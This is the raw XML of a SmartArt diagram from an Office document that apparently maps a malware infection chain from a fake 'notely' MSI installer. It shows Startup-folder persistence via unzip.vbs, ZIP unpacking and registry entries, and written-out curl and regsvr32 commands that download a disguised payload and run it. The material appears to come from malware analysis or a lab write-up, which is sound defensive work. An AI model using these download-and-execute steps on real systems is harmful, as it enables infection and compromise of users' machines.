    <dgm:cxn modelId="{4BEF09EA-BE59-4FBF-8E1F-6498245101D8}" srcId="{C656A8D3-7D7E-4266-B13C-8EDCC80DD6A8}" destId="{10258744-440A-4C9B-8BC5-3F3EF92E8BF2}" srcOrd="1" destOrd="0" parTransId="{0C90E3CA-5C99-4958-828C-4E5B841DA1A6}" sibTransId="{517E5413-A508-4C54-8EF1-B8E794171C59}"/>
    <dgm:cxn modelId="{005ACAEC-2321-4E74-8CF0-8F1AFCA87FBB}" type="presOf" srcId="{6675F9D1-DCCC-470A-A306-D50BD14A969B}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{33EA6AEF-28E8-4E01-A953-813E8978679B}" type="presParOf" srcId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" destId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{58AD8839-285C-4F83-9AF4-2790F9F4DE31}" type="presParOf" srcId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" destId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{A98E5DF1-C8DA-4F34-B35D-8AEA58040CAE}" type="presParOf" srcId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" destId="{B369C25D-8E0D-4F88-ABDE-6DF39D006121}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{3C331EDB-70BA-4E4B-93ED-E1B622F56FB7}" type="presParOf" srcId="{98582C2D-0429-4FB5-89AC-BE9582CF866C}" destId="{F814D6A9-FE86-4E60-B88F-F892FC0CDDFB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{A5E69DDF-2F4B-4311-8985-D89931ECECAD}" type="presParOf" srcId="{E7725A94-E1DA-4F39-93A7-FDD965858616}" destId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{02E19F3D-11BA-4120-8A4F-108763FA6EDA}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{7B08DFFE-4EC1-4C43-AE9D-42B94E05D522}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{89FB2471-01EA-441B-BC7F-E4F253684720}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{60EED537-89B6-4747-B33C-84D6B506FB7C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{ADC5EE76-412B-44C6-9B9D-C3793B3FD3D4}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{11906579-E254-4F53-A5D7-645CFEDAB012}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{31ABEBB1-F8A3-4004-9294-C8960A3D4A86}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{1C736118-38E2-44B6-B438-9AB467A9FC33}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{77330FBB-E88B-4AF5-9D72-F93FCA1A6BEC}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{6408ABE0-3FC7-40C6-9F81-57DD8E005CA0}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8199590A-26A1-4BF1-9D6F-DC8A139EB6BC}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{3A57D2EB-E02E-4318-A167-E586C0E63827}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{ADA5C93E-BD91-4ECA-8582-5AD388D639DA}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{F27BF41D-47D5-42E7-9933-95A66D73FAD0}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{6C105CA7-60ED-4B3B-82FE-11A8E6382B5C}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{468B0EA1-55D9-4F95-8CB4-1BB5CFDF43FF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{8C9C77E0-E6C4-4E56-95D8-CE5228AF8A43}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{45461A3F-A12D-4329-92B3-0B4B20E2AFC2}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{81CDCCEE-6D47-4AF9-97AF-D303A141EC73}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{F29D095E-9C1D-40B3-86E2-EA392567F600}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{CE569592-13BA-4B4F-9369-C5FF01CA4D0D}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{02FF1BE0-F04F-4625-AF0E-93BEDA34D2E6}" type="presParOf" srcId="{1D4118F7-38F5-4EE6-9CEE-354525C6F117}" destId="{6346F79D-E94C-4835-B5F5-5E6067D9DF13}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{589BE807-98ED-47C7-9094-F65024B050D6}" type="presParOf" srcId="{4720D96E-6E0C-4A07-BAE1-10A99FFDEAA0}" destId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{83BFA9E1-4FA1-4082-AFBF-1B1B8A3AA80A}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{37ABD5F9-3970-46C0-985E-AE9C9ED310D8}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{C70499B9-9E13-4666-9509-800D713B9607}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{DD6D6D96-23D3-4685-A7C0-F844A832F7F9}" type="presParOf" srcId="{AE7A2C11-5012-4666-8E26-7D1F496AAD46}" destId="{F1123AB9-6632-421F-9FA1-D52FCB934995}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{7AF42180-C119-488D-B438-CCE084D9ED00}" type="presParOf" srcId="{52A86321-27B9-40CC-8E67-EBE46F64F4AA}" destId="{3B261433-48B5-45E1-8302-2E3844F6256B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{E0B7FF04-F459-4B80-9874-D8684A1AADF9}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy3"/>
    <dgm:cxn modelId="{2B9207E1-539D-40F7-AD18-72E04F105C3F}" type="presParOf" srcId="{3B261433-48B5-45E1-8302-2E3844F6256B}" destId="{BB74F4A0-6667-4351-9A85-AA0C7736449F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9C25D-8E0D-4F88-ABDE-6DF39D006121}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2291" y="517941"/>
          <a:ext cx="2782619" cy="8880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notely-setup-x64.msi</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="28302" y="543952"/>
        <a:ext cx="2730597" cy="836062"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7B08DFFE-4EC1-4C43-AE9D-42B94E05D522}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="387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04"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="387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ED537-89B6-4747-B33C-84D6B506FB7C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="1535060"/>
          <a:ext cx="2372397" cy="516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\Users\howl\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unzip.vbs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="1550177"/>
        <a:ext cx="2342163" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11906579-E254-4F53-A5D7-645CFEDAB012}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="1032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278"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="1032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36118-38E2-44B6-B438-9AB467A9FC33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="2180234"/>
          <a:ext cx="3311812" cy="516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Unpack and save a ZIP file (Emergreport.zip) to C:/Users/howl/AppData/Roaming</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="2195351"/>
        <a:ext cx="3281578" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6408ABE0-3FC7-40C6-9F81-57DD8E005CA0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="1677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451"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="1677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7D2EB-E02E-4318-A167-E586C0E63827}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="2825408"/>
          <a:ext cx="5943832" cy="516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Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>then:HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\SharedDlls\C:\Users\howl\AppData\Roaming\Emergreport.zip</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="2840525"/>
        <a:ext cx="5913598" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F27BF41D-47D5-42E7-9933-95A66D73FAD0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="2322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2625"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="2322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B0EA1-55D9-4F95-8CB4-1BB5CFDF43FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="3470581"/>
          <a:ext cx="5583955" cy="516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Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\PnpLockdownFiles\%SystemDrive%/Users/howl/AppData/Roaming/Emergreport.zip</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="3485698"/>
        <a:ext cx="5553721" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F3AEC5B-59CB-4856-A9B4-4AC80551FF5B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="2967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7799"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="2967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DCCEE-6D47-4AF9-97AF-D303A141EC73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="4115755"/>
          <a:ext cx="5194365" cy="516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Then it excute this command:C:\Windows\system32\curl -s -o C:\Users\howl\AppData\Roaming\oneWitch.png consumerfinancereport.local/blog/index/witchABy.jpg</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="4130872"/>
        <a:ext cx="5164131" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CE569592-13BA-4B4F-9369-C5FF01CA4D0D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="280553" y="1406025"/>
          <a:ext cx="278261" cy="3612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2973"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="278261" y="3612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6F79D-E94C-4835-B5F5-5E6067D9DF13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="558815" y="4760929"/>
          <a:ext cx="4735406" cy="516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C:\Windows\system32\regsvr32 C:\Users\howl\AppData\Roaming\OneWitch.png</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200">
            <a:latin typeface="Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="573932" y="4776046"/>
        <a:ext cx="4705172" cy="485905"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C70499B9-9E13-4666-9509-800D713B9607}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3042980" y="517941"/>
          <a:ext cx="1444590" cy="890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Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>notely.exe</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3069074" y="544035"/>
        <a:ext cx="1392402" cy="838740"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A2CC9F21-EE73-4FD0-8A58-7D3DBBA5D03A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3187439" y="1408869"/>
          <a:ext cx="144459" cy="387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04"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="144459" y="387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4F4A0-6667-4351-9A85-AA0C7736449F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3331898" y="1537904"/>
          <a:ext cx="2084301" cy="516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Montserrat" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:rPr>
            <a:t>Located at a folder named NoCapSoftware and has a shortcut in Desktop</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3347015" y="1553021"/>
        <a:ext cx="2054067" cy="485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9T00:12:53.0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16,'7576'0,"-7405"-11,-164 10,29-2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9T00:12:51.7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1,'1'1,"0"-1,0 1,0 0,1 0,-1-1,0 1,0-1,0 1,1-1,-1 0,0 0,1 1,-1-1,0 0,1 0,-1 0,2 0,3 0,535 13,-346-15,263 2,763 12,-1102-5,230 45,-327-47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9T00:12:50.9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1,'2416'24,"-1547"-9,-821-15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9T00:12:50.1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1,'326'15,"-111"-2,1203 87,-1054-69,17 3,-225-21,175-9,-243-5,-55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2024-02-18T20:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-19T00:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>